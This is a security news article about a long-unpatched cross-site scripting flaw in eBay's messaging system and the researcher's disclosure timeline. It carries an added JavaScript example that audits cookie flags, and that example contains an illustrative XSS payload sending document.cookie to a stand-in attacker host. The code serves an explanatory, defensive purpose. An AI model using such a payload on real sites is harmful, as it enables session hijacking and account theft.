A potentially dangerous cross-site scripting (XSS) vulnerability has existed in eBay for more than a year, and it doesn’t appear the company is in a rush to fix the issue.
Jaanus Kääp, a researcher based in Estonia, discovered the issue more than a year ago when he was looking into the security of web apps. Kääp, who also does pen-testing and training for the firm Clarified Security, disclosed the issue on Full Disclosure yesterday.
Kääp emailed eBay four times over the course of 12 months: initially a year ago, then again three, five, and seven months after he discovered the bug. After repeated prodding, officials at eBay told Kääp they could not reveal any information about the fix schedule. Each time he emailed, Kääp says, it was because the vulnerability had still not been remedied. eBay asked him not to disclose the bug, but it never gave him a timeline for a fix.
At the time Kääp didn’t think much of the emails and assumed that, since it appeared to be an easy fix, the company would promptly address the issue. Kääp was flabbergasted, however, when he logged into the site on Tuesday, a year after he first found the issue, to discover it still exists.
“It was still there,” Kääp wrote in a blog entry Tuesday, “So it must not be as dangerous as I thought and no harm can happen from making it public.”
According to the description on Kääp’s blog, the bug allows an attacker to carry out an XSS attack through eBay’s internal messaging system by intercepting and modifying a request. Kääp points out that the vulnerability could be a “high issue” for targeted attacks, since eBay’s session cookies are not marked HttpOnly. The HttpOnly flag keeps a cookie out of reach of page scripts (it is hidden from document.cookie), so it does not prevent XSS itself but limits the damage; without it, an injected script can read the session cookie and hand the victim’s logged-in session to the attacker.
Kääp found the issue by attaching a photo to a message, uploading it, and modifying the GET request (including its headers) he captured in Burp Suite so that it contained a payload.
For his proof of concept Kääp simply used a run-of-the-mill XSS alert(), but he writes that he does not believe there are any limiting factors on the XSS payload. Kääp also warns that the issue could be combined with other vulnerabilities, and that it would be easy to create new users, without email verification, to carry out the attacks.
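The two points above, that an alert() is only a placeholder for any payload and that the missing HttpOnly flag is what turns an XSS into session theft, are easiest to see with a small check a pentester would run against a site's response headers. The following is an added example written for this article, not code from Kääp, eBay, or Threatpost. It parses Set-Cookie header values, flags session-looking cookies that lack HttpOnly, Secure, or SameSite, and models what document.cookie would expose to injected script (browsers hide HttpOnly cookies from it). The header values, the cookie-name heuristic, and the attacker.example host in the illustrative payload are all constructed for the example, not captured eBay traffic.

```javascript
// Added example: audit Set-Cookie headers and show what an XSS payload could read.
// All sample headers below are constructed; none come from eBay.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are lowercased; flag attributes (Secure, HttpOnly) become true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const value = eq === -1 ? '' : parts[0].slice(eq + 1);
  const attrs = {};
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, value, attrs };
}

// Heuristic (assumption for this example): names that usually carry an
// authenticated session. Real audits should use the site's known cookie names.
const SESSION_NAME_RE = /(sess|sid|auth|token|login)/i;

// Report session-like cookies missing the attributes that limit what an
// injected script (or a network attacker) can do with them.
function auditCookies(setCookieHeaders) {
  const findings = [];
  for (const h of setCookieHeaders) {
    const c = parseSetCookie(h);
    if (!SESSION_NAME_RE.test(c.name)) continue;
    const missing = [];
    if (!c.attrs.httponly) missing.push('HttpOnly');
    if (!c.attrs.secure) missing.push('Secure');
    if (!c.attrs.samesite) missing.push('SameSite');
    if (missing.length) findings.push({ name: c.name, missing });
  }
  return findings;
}

// Model of what `document.cookie` exposes to page script: browsers omit
// HttpOnly cookies, so everything else is readable and exfiltratable.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed samples: the weak configuration and its hardened counterpart.
const WEAK_HEADERS = [
  'sessionid=abc123; Path=/',
  'prefs=dark; Path=/',
];
const HARDENED_HEADERS = [
  'sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'prefs=dark; Path=/',
];

// Illustrative payload (hypothetical host): instead of alert(), an XSS would
// ship document.cookie off-site. With HttpOnly set, the session id is not in it.
const EXFIL_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/c?\'+encodeURIComponent(document.cookie))">';

// Stand-alone run under Node (skipped when loaded by a test harness).
if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log('weak findings:', JSON.stringify(auditCookies(WEAK_HEADERS)));
  console.log('weak document.cookie:', scriptVisibleCookies(WEAK_HEADERS));
  console.log('hardened findings:', JSON.stringify(auditCookies(HARDENED_HEADERS)));
  console.log('hardened document.cookie:', scriptVisibleCookies(HARDENED_HEADERS));
  console.log('payload length:', EXFIL_PAYLOAD.length);
}
```

Run it with Node to see that the weak response leaks sessionid=abc123 through document.cookie, while the hardened response leaves only the harmless prefs cookie visible. HttpOnly does not fix the XSS itself (the script still runs as the victim and can issue requests in their session), which is why the underlying input-handling bug still needs to be patched.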
It remains unclear whether eBay is still planning a fix for Kääp’s issue. The company did not immediately respond to Threatpost’s request for comment on Wednesday.